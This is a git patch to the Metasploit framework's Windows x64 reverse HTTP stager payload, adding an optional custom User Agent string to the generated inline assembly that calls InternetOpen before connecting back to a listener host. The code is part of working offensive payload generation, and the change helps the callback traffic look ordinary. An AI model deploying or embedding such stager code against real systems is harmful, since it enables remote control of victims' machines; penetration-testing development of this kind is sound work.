From 8af31e6b01704cd5c687ed6ad7fd27bb5a483815 Mon Sep 17 00:00:00 2001 From: pczinser Date: Sat, 14 Dec 2024 15:39:16 -0500 Subject: [PATCH] updated the inline asm to use User Agent --- .../payload/windows/x64/reverse_http_x64.rb | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb index 21e87d26efef..d6ddf74b7cb6 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http_x64.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http_x64.rb @@ -62,7 +62,7 @@ def generate(opts={}) # Otherwise default to small URIs conf[:url] = luri + generate_small_uri end - + generate_reverse_http(conf) end @@ -168,6 +168,7 @@ def asm_generate_ascii_array(str) # @option opts [String] :url The URI to request during staging # @option opts [String] :host The host to connect to # @option opts [Integer] :port The port to connect to + # @option opts [String] :ua The User Agent the payload will use # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh # @option opts [String] :proxy_host The optional proxy server host to use # @option opts [Integer] :proxy_port The optional proxy server port to use @@ -245,9 +246,21 @@ def asm_reverse_http(opts={}) internetopen: push rbx ; stack alignment push rbx ; NULL pointer - mov rcx, rsp ; lpszAgent ("") ^ + if opts[:ua] + asm << %Q^ + call load_useragent + db"#{opts[:ua]}", 0x00 + load_useragent: + pop rcx ; lpszAgent (stack pointer) + ^ + else + asm << %Q^ + mov rcx, rsp ; lpszAgent("") + ^ + end + if proxy_enabled asm << %Q^ push 3